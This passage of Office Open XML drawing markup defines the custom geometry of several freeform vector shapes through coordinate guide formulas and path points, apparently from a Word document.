                              <a:gd name="T24" fmla="*/ 461 w 535"/>
                              <a:gd name="T25" fmla="*/ 720 h 1168"/>
                              <a:gd name="T26" fmla="*/ 453 w 535"/>
                              <a:gd name="T27" fmla="*/ 779 h 1168"/>
                              <a:gd name="T28" fmla="*/ 445 w 535"/>
                              <a:gd name="T29" fmla="*/ 818 h 1168"/>
                              <a:gd name="T30" fmla="*/ 436 w 535"/>
                              <a:gd name="T31" fmla="*/ 876 h 1168"/>
                              <a:gd name="T32" fmla="*/ 445 w 535"/>
                              <a:gd name="T33" fmla="*/ 935 h 1168"/>
                              <a:gd name="T34" fmla="*/ 461 w 535"/>
                              <a:gd name="T35" fmla="*/ 1012 h 1168"/>
                              <a:gd name="T36" fmla="*/ 478 w 535"/>
                              <a:gd name="T37" fmla="*/ 1090 h 1168"/>
                              <a:gd name="T38" fmla="*/ 486 w 535"/>
                              <a:gd name="T39" fmla="*/ 1149 h 1168"/>
                              <a:gd name="T40" fmla="*/ 494 w 535"/>
                              <a:gd name="T41" fmla="*/ 1168 h 1168"/>
                              <a:gd name="T42" fmla="*/ 502 w 535"/>
                              <a:gd name="T43" fmla="*/ 1149 h 1168"/>
                              <a:gd name="T44" fmla="*/ 527 w 535"/>
                              <a:gd name="T45" fmla="*/ 1051 h 1168"/>
                              <a:gd name="T46" fmla="*/ 535 w 535"/>
                              <a:gd name="T47" fmla="*/ 954 h 1168"/>
                              <a:gd name="T48" fmla="*/ 535 w 535"/>
                              <a:gd name="T49" fmla="*/ 837 h 1168"/>
                              <a:gd name="T50" fmla="*/ 519 w 535"/>
                              <a:gd name="T51" fmla="*/ 720 h 1168"/>
                              <a:gd name="T52" fmla="*/ 469 w 535"/>
                              <a:gd name="T53" fmla="*/ 487 h 1168"/>
                              <a:gd name="T54" fmla="*/ 404 w 535"/>
                              <a:gd name="T55" fmla="*/ 292 h 1168"/>
                              <a:gd name="T56" fmla="*/ 346 w 535"/>
                              <a:gd name="T57" fmla="*/ 176 h 1168"/>
                              <a:gd name="T58" fmla="*/ 288 w 535"/>
                              <a:gd name="T59" fmla="*/ 78 h 1168"/>
                              <a:gd name="T60" fmla="*/ 239 w 535"/>
                              <a:gd name="T61" fmla="*/ 20 h 1168"/>
                              <a:gd name="T62" fmla="*/ 190 w 535"/>
                              <a:gd name="T63" fmla="*/ 0 h 1168"/>
                              <a:gd name="T64" fmla="*/ 148 w 535"/>
                              <a:gd name="T65" fmla="*/ 0 h 1168"/>
                              <a:gd name="T66" fmla="*/ 107 w 535"/>
                              <a:gd name="T67" fmla="*/ 20 h 1168"/>
                              <a:gd name="T68" fmla="*/ 42 w 535"/>
                              <a:gd name="T69" fmla="*/ 137 h 1168"/>
                              <a:gd name="T70" fmla="*/ 9 w 535"/>
                              <a:gd name="T71" fmla="*/ 234 h 1168"/>
                              <a:gd name="T72" fmla="*/ 0 w 535"/>
                              <a:gd name="T73" fmla="*/ 331 h 1168"/>
                              <a:gd name="T74" fmla="*/ 0 w 535"/>
                              <a:gd name="T75" fmla="*/ 468 h 1168"/>
                              <a:gd name="T76" fmla="*/ 9 w 535"/>
                              <a:gd name="T77" fmla="*/ 584 h 1168"/>
                              <a:gd name="T78" fmla="*/ 33 w 535"/>
                              <a:gd name="T79" fmla="*/ 682 h 1168"/>
                              <a:gd name="T80" fmla="*/ 58 w 535"/>
                              <a:gd name="T81" fmla="*/ 779 h 1168"/>
                              <a:gd name="T82" fmla="*/ 91 w 535"/>
                              <a:gd name="T83" fmla="*/ 837 h 1168"/>
                              <a:gd name="T84" fmla="*/ 132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132" y="857"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="148" y="837"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="798"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="124" y="740"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="124" y="643"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="132" y="506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="173" y="390"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="223" y="292"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="280" y="273"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="330" y="312"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="371" y="370"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="445" y="584"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="461" y="720"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="453" y="779"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="445" y="818"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="436" y="876"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="445" y="935"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="461" y="1012"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="478" y="1090"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="486" y="1149"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="494" y="1168"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="502" y="1149"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="527" y="1051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="535" y="954"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="535" y="837"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="519" y="720"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="469" y="487"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="404" y="292"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="346" y="176"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="288" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="239" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="190" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42" y="137"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9" y="234"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="468"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9" y="584"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="682"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="58" y="779"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="91" y="837"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="132"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64751658" name="Freeform 12"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5550" y="6105"/>
                            <a:ext cx="82" cy="212"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 362 w 493"/>
                              <a:gd name="T1" fmla="*/ 311 h 1265"/>
                              <a:gd name="T2" fmla="*/ 353 w 493"/>
                              <a:gd name="T3" fmla="*/ 350 h 1265"/>
                              <a:gd name="T4" fmla="*/ 337 w 493"/>
                              <a:gd name="T5" fmla="*/ 331 h 1265"/>
                              <a:gd name="T6" fmla="*/ 312 w 493"/>
                              <a:gd name="T7" fmla="*/ 292 h 1265"/>
                              <a:gd name="T8" fmla="*/ 271 w 493"/>
                              <a:gd name="T9" fmla="*/ 273 h 1265"/>
                              <a:gd name="T10" fmla="*/ 213 w 493"/>
                              <a:gd name="T11" fmla="*/ 311 h 1265"/>
                              <a:gd name="T12" fmla="*/ 164 w 493"/>
                              <a:gd name="T13" fmla="*/ 389 h 1265"/>
                              <a:gd name="T14" fmla="*/ 123 w 493"/>
                              <a:gd name="T15" fmla="*/ 526 h 1265"/>
                              <a:gd name="T16" fmla="*/ 115 w 493"/>
                              <a:gd name="T17" fmla="*/ 662 h 1265"/>
                              <a:gd name="T18" fmla="*/ 131 w 493"/>
                              <a:gd name="T19" fmla="*/ 778 h 1265"/>
                              <a:gd name="T20" fmla="*/ 156 w 493"/>
                              <a:gd name="T21" fmla="*/ 876 h 1265"/>
                              <a:gd name="T22" fmla="*/ 246 w 493"/>
                              <a:gd name="T23" fmla="*/ 1051 h 1265"/>
                              <a:gd name="T24" fmla="*/ 304 w 493"/>
                              <a:gd name="T25" fmla="*/ 1090 h 1265"/>
                              <a:gd name="T26" fmla="*/ 329 w 493"/>
                              <a:gd name="T27" fmla="*/ 1070 h 1265"/>
                              <a:gd name="T28" fmla="*/ 345 w 493"/>
                              <a:gd name="T29" fmla="*/ 1051 h 1265"/>
                              <a:gd name="T30" fmla="*/ 370 w 493"/>
                              <a:gd name="T31" fmla="*/ 1031 h 1265"/>
                              <a:gd name="T32" fmla="*/ 395 w 493"/>
                              <a:gd name="T33" fmla="*/ 1051 h 1265"/>
                              <a:gd name="T34" fmla="*/ 427 w 493"/>
                              <a:gd name="T35" fmla="*/ 1090 h 1265"/>
                              <a:gd name="T36" fmla="*/ 460 w 493"/>
                              <a:gd name="T37" fmla="*/ 1129 h 1265"/>
                              <a:gd name="T38" fmla="*/ 477 w 493"/>
                              <a:gd name="T39" fmla="*/ 1148 h 1265"/>
                              <a:gd name="T40" fmla="*/ 493 w 493"/>
                              <a:gd name="T41" fmla="*/ 1148 h 1265"/>
                              <a:gd name="T42" fmla="*/ 485 w 493"/>
                              <a:gd name="T43" fmla="*/ 1187 h 1265"/>
                              <a:gd name="T44" fmla="*/ 444 w 493"/>
                              <a:gd name="T45" fmla="*/ 1246 h 1265"/>
                              <a:gd name="T46" fmla="*/ 403 w 493"/>
                              <a:gd name="T47" fmla="*/ 1265 h 1265"/>
                              <a:gd name="T48" fmla="*/ 353 w 493"/>
                              <a:gd name="T49" fmla="*/ 1265 h 1265"/>
                              <a:gd name="T50" fmla="*/ 304 w 493"/>
                              <a:gd name="T51" fmla="*/ 1226 h 1265"/>
                              <a:gd name="T52" fmla="*/ 205 w 493"/>
                              <a:gd name="T53" fmla="*/ 1109 h 1265"/>
                              <a:gd name="T54" fmla="*/ 123 w 493"/>
                              <a:gd name="T55" fmla="*/ 954 h 1265"/>
                              <a:gd name="T56" fmla="*/ 74 w 493"/>
                              <a:gd name="T57" fmla="*/ 817 h 1265"/>
                              <a:gd name="T58" fmla="*/ 32 w 493"/>
                              <a:gd name="T59" fmla="*/ 681 h 1265"/>
                              <a:gd name="T60" fmla="*/ 8 w 493"/>
                              <a:gd name="T61" fmla="*/ 564 h 1265"/>
                              <a:gd name="T62" fmla="*/ 0 w 493"/>
                              <a:gd name="T63" fmla="*/ 448 h 1265"/>
                              <a:gd name="T64" fmla="*/ 0 w 493"/>
                              <a:gd name="T65" fmla="*/ 350 h 1265"/>
                              <a:gd name="T66" fmla="*/ 8 w 493"/>
                              <a:gd name="T67" fmla="*/ 253 h 1265"/>
                              <a:gd name="T68" fmla="*/ 57 w 493"/>
                              <a:gd name="T69" fmla="*/ 97 h 1265"/>
                              <a:gd name="T70" fmla="*/ 90 w 493"/>
                              <a:gd name="T71" fmla="*/ 20 h 1265"/>
                              <a:gd name="T72" fmla="*/ 139 w 493"/>
                              <a:gd name="T73" fmla="*/ 0 h 1265"/>
                              <a:gd name="T74" fmla="*/ 189 w 493"/>
                              <a:gd name="T75" fmla="*/ 0 h 1265"/>
                              <a:gd name="T76" fmla="*/ 246 w 493"/>
                              <a:gd name="T77" fmla="*/ 20 h 1265"/>
                              <a:gd name="T78" fmla="*/ 288 w 493"/>
                              <a:gd name="T79" fmla="*/ 78 h 1265"/>
                              <a:gd name="T80" fmla="*/ 329 w 493"/>
                              <a:gd name="T81" fmla="*/ 136 h 1265"/>
                              <a:gd name="T82" fmla="*/ 353 w 493"/>
                              <a:gd name="T83" fmla="*/ 214 h 1265"/>
                              <a:gd name="T84" fmla="*/ 362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311"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="353" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="337" y="331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="312" y="292"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="271" y="273"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="213" y="311"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="164" y="389"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123" y="526"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="115" y="662"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131" y="778"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="876"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="246" y="1051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="304" y="1090"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="329" y="1070"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="345" y="1051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="370" y="1031"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="395" y="1051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="427" y="1090"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="460" y="1129"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="477" y="1148"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="493" y="1148"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="485" y="1187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="444" y="1246"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="403" y="1265"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="353" y="1265"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="304" y="1226"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="205" y="1109"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123" y="954"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="817"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="32" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="564"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="57" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="139" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="246" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="288" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="329" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="353" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="36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721210348" name="Freeform 13"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5557" y="6115"/>
                            <a:ext cx="127" cy="302"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 757 w 765"/>
                              <a:gd name="T1" fmla="*/ 1790 h 1809"/>
                              <a:gd name="T2" fmla="*/ 765 w 765"/>
                              <a:gd name="T3" fmla="*/ 1692 h 1809"/>
                              <a:gd name="T4" fmla="*/ 749 w 765"/>
                              <a:gd name="T5" fmla="*/ 1556 h 1809"/>
                              <a:gd name="T6" fmla="*/ 740 w 765"/>
                              <a:gd name="T7" fmla="*/ 1439 h 1809"/>
                              <a:gd name="T8" fmla="*/ 757 w 765"/>
                              <a:gd name="T9" fmla="*/ 1342 h 1809"/>
                              <a:gd name="T10" fmla="*/ 749 w 765"/>
                              <a:gd name="T11" fmla="*/ 1303 h 1809"/>
                              <a:gd name="T12" fmla="*/ 740 w 765"/>
                              <a:gd name="T13" fmla="*/ 1303 h 1809"/>
                              <a:gd name="T14" fmla="*/ 724 w 765"/>
                              <a:gd name="T15" fmla="*/ 1303 h 1809"/>
                              <a:gd name="T16" fmla="*/ 691 w 765"/>
                              <a:gd name="T17" fmla="*/ 1303 h 1809"/>
                              <a:gd name="T18" fmla="*/ 609 w 765"/>
                              <a:gd name="T19" fmla="*/ 1225 h 1809"/>
                              <a:gd name="T20" fmla="*/ 510 w 765"/>
                              <a:gd name="T21" fmla="*/ 1089 h 1809"/>
                              <a:gd name="T22" fmla="*/ 411 w 765"/>
                              <a:gd name="T23" fmla="*/ 934 h 1809"/>
                              <a:gd name="T24" fmla="*/ 362 w 765"/>
                              <a:gd name="T25" fmla="*/ 778 h 1809"/>
                              <a:gd name="T26" fmla="*/ 304 w 765"/>
                              <a:gd name="T27" fmla="*/ 583 h 1809"/>
                              <a:gd name="T28" fmla="*/ 280 w 765"/>
                              <a:gd name="T29" fmla="*/ 369 h 1809"/>
                              <a:gd name="T30" fmla="*/ 271 w 765"/>
                              <a:gd name="T31" fmla="*/ 272 h 1809"/>
                              <a:gd name="T32" fmla="*/ 288 w 765"/>
                              <a:gd name="T33" fmla="*/ 155 h 1809"/>
                              <a:gd name="T34" fmla="*/ 288 w 765"/>
                              <a:gd name="T35" fmla="*/ 116 h 1809"/>
                              <a:gd name="T36" fmla="*/ 288 w 765"/>
                              <a:gd name="T37" fmla="*/ 77 h 1809"/>
                              <a:gd name="T38" fmla="*/ 255 w 765"/>
                              <a:gd name="T39" fmla="*/ 58 h 1809"/>
                              <a:gd name="T40" fmla="*/ 197 w 765"/>
                              <a:gd name="T41" fmla="*/ 97 h 1809"/>
                              <a:gd name="T42" fmla="*/ 173 w 765"/>
                              <a:gd name="T43" fmla="*/ 97 h 1809"/>
                              <a:gd name="T44" fmla="*/ 107 w 765"/>
                              <a:gd name="T45" fmla="*/ 58 h 1809"/>
                              <a:gd name="T46" fmla="*/ 25 w 765"/>
                              <a:gd name="T47" fmla="*/ 0 h 1809"/>
                              <a:gd name="T48" fmla="*/ 8 w 765"/>
                              <a:gd name="T49" fmla="*/ 0 h 1809"/>
                              <a:gd name="T50" fmla="*/ 0 w 765"/>
                              <a:gd name="T51" fmla="*/ 0 h 1809"/>
                              <a:gd name="T52" fmla="*/ 0 w 765"/>
                              <a:gd name="T53" fmla="*/ 19 h 1809"/>
                              <a:gd name="T54" fmla="*/ 0 w 765"/>
                              <a:gd name="T55" fmla="*/ 58 h 1809"/>
                              <a:gd name="T56" fmla="*/ 25 w 765"/>
                              <a:gd name="T57" fmla="*/ 252 h 1809"/>
                              <a:gd name="T58" fmla="*/ 41 w 765"/>
                              <a:gd name="T59" fmla="*/ 408 h 1809"/>
                              <a:gd name="T60" fmla="*/ 41 w 765"/>
                              <a:gd name="T61" fmla="*/ 467 h 1809"/>
                              <a:gd name="T62" fmla="*/ 25 w 765"/>
                              <a:gd name="T63" fmla="*/ 603 h 1809"/>
                              <a:gd name="T64" fmla="*/ 25 w 765"/>
                              <a:gd name="T65" fmla="*/ 642 h 1809"/>
                              <a:gd name="T66" fmla="*/ 33 w 765"/>
                              <a:gd name="T67" fmla="*/ 681 h 1809"/>
                              <a:gd name="T68" fmla="*/ 49 w 765"/>
                              <a:gd name="T69" fmla="*/ 681 h 1809"/>
                              <a:gd name="T70" fmla="*/ 66 w 765"/>
                              <a:gd name="T71" fmla="*/ 661 h 1809"/>
                              <a:gd name="T72" fmla="*/ 115 w 765"/>
                              <a:gd name="T73" fmla="*/ 642 h 1809"/>
                              <a:gd name="T74" fmla="*/ 164 w 765"/>
                              <a:gd name="T75" fmla="*/ 661 h 1809"/>
                              <a:gd name="T76" fmla="*/ 247 w 765"/>
                              <a:gd name="T77" fmla="*/ 719 h 1809"/>
                              <a:gd name="T78" fmla="*/ 329 w 765"/>
                              <a:gd name="T79" fmla="*/ 856 h 1809"/>
                              <a:gd name="T80" fmla="*/ 395 w 765"/>
                              <a:gd name="T81" fmla="*/ 972 h 1809"/>
                              <a:gd name="T82" fmla="*/ 461 w 765"/>
                              <a:gd name="T83" fmla="*/ 1187 h 1809"/>
                              <a:gd name="T84" fmla="*/ 518 w 765"/>
                              <a:gd name="T85" fmla="*/ 1439 h 1809"/>
                              <a:gd name="T86" fmla="*/ 551 w 765"/>
                              <a:gd name="T87" fmla="*/ 1634 h 1809"/>
                              <a:gd name="T88" fmla="*/ 551 w 765"/>
                              <a:gd name="T89" fmla="*/ 1712 h 1809"/>
                              <a:gd name="T90" fmla="*/ 551 w 765"/>
                              <a:gd name="T91" fmla="*/ 1751 h 1809"/>
                              <a:gd name="T92" fmla="*/ 551 w 765"/>
                              <a:gd name="T93" fmla="*/ 1770 h 1809"/>
                              <a:gd name="T94" fmla="*/ 568 w 765"/>
                              <a:gd name="T95" fmla="*/ 1790 h 1809"/>
                              <a:gd name="T96" fmla="*/ 609 w 765"/>
                              <a:gd name="T97" fmla="*/ 1751 h 1809"/>
                              <a:gd name="T98" fmla="*/ 658 w 765"/>
                              <a:gd name="T99" fmla="*/ 1770 h 1809"/>
                              <a:gd name="T100" fmla="*/ 716 w 765"/>
                              <a:gd name="T101" fmla="*/ 1809 h 1809"/>
                              <a:gd name="T102" fmla="*/ 757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757" y="1790"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="765" y="1692"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="749" y="1556"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="740" y="1439"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="757" y="1342"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="749" y="1303"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="740" y="1303"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="724" y="1303"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="691" y="1303"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="609" y="1225"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="510" y="1089"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="411" y="934"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="362" y="778"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="304" y="583"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="280" y="369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="271" y="272"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="288" y="155"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="288" y="116"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="288" y="77"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="255" y="58"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="173" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="58"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="58"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="252"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="408"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="661"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="115" y="642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="164" y="661"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="247" y="719"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="329" y="856"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="395" y="972"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="461" y="1187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="518" y="1439"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="551" y="1634"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="551" y="1712"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="551" y="1751"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="551" y="1770"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="568" y="1790"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="609" y="1751"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="658" y="1770"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="716" y="1809"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="757"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413306124" name="Freeform 14"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6873" y="6235"/>
                            <a:ext cx="90" cy="195"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 395 w 535"/>
                              <a:gd name="T1" fmla="*/ 857 h 1168"/>
                              <a:gd name="T2" fmla="*/ 378 w 535"/>
                              <a:gd name="T3" fmla="*/ 837 h 1168"/>
                              <a:gd name="T4" fmla="*/ 395 w 535"/>
                              <a:gd name="T5" fmla="*/ 798 h 1168"/>
                              <a:gd name="T6" fmla="*/ 403 w 535"/>
                              <a:gd name="T7" fmla="*/ 740 h 1168"/>
                              <a:gd name="T8" fmla="*/ 411 w 535"/>
                              <a:gd name="T9" fmla="*/ 643 h 1168"/>
                              <a:gd name="T10" fmla="*/ 403 w 535"/>
                              <a:gd name="T11" fmla="*/ 506 h 1168"/>
                              <a:gd name="T12" fmla="*/ 362 w 535"/>
                              <a:gd name="T13" fmla="*/ 390 h 1168"/>
                              <a:gd name="T14" fmla="*/ 304 w 535"/>
                              <a:gd name="T15" fmla="*/ 292 h 1168"/>
                              <a:gd name="T16" fmla="*/ 247 w 535"/>
                              <a:gd name="T17" fmla="*/ 273 h 1168"/>
                              <a:gd name="T18" fmla="*/ 197 w 535"/>
                              <a:gd name="T19" fmla="*/ 312 h 1168"/>
                              <a:gd name="T20" fmla="*/ 156 w 535"/>
                              <a:gd name="T21" fmla="*/ 370 h 1168"/>
                              <a:gd name="T22" fmla="*/ 82 w 535"/>
                              <a:gd name="T23" fmla="*/ 584 h 1168"/>
                              <a:gd name="T24" fmla="*/ 66 w 535"/>
                              <a:gd name="T25" fmla="*/ 720 h 1168"/>
                              <a:gd name="T26" fmla="*/ 74 w 535"/>
                              <a:gd name="T27" fmla="*/ 779 h 1168"/>
                              <a:gd name="T28" fmla="*/ 90 w 535"/>
                              <a:gd name="T29" fmla="*/ 818 h 1168"/>
                              <a:gd name="T30" fmla="*/ 99 w 535"/>
                              <a:gd name="T31" fmla="*/ 876 h 1168"/>
                              <a:gd name="T32" fmla="*/ 82 w 535"/>
                              <a:gd name="T33" fmla="*/ 935 h 1168"/>
                              <a:gd name="T34" fmla="*/ 66 w 535"/>
                              <a:gd name="T35" fmla="*/ 1012 h 1168"/>
                              <a:gd name="T36" fmla="*/ 49 w 535"/>
                              <a:gd name="T37" fmla="*/ 1090 h 1168"/>
                              <a:gd name="T38" fmla="*/ 41 w 535"/>
                              <a:gd name="T39" fmla="*/ 1149 h 1168"/>
                              <a:gd name="T40" fmla="*/ 41 w 535"/>
                              <a:gd name="T41" fmla="*/ 1168 h 1168"/>
                              <a:gd name="T42" fmla="*/ 33 w 535"/>
                              <a:gd name="T43" fmla="*/ 1149 h 1168"/>
                              <a:gd name="T44" fmla="*/ 8 w 535"/>
                              <a:gd name="T45" fmla="*/ 1051 h 1168"/>
                              <a:gd name="T46" fmla="*/ 0 w 535"/>
                              <a:gd name="T47" fmla="*/ 954 h 1168"/>
                              <a:gd name="T48" fmla="*/ 0 w 535"/>
                              <a:gd name="T49" fmla="*/ 837 h 1168"/>
                              <a:gd name="T50" fmla="*/ 8 w 535"/>
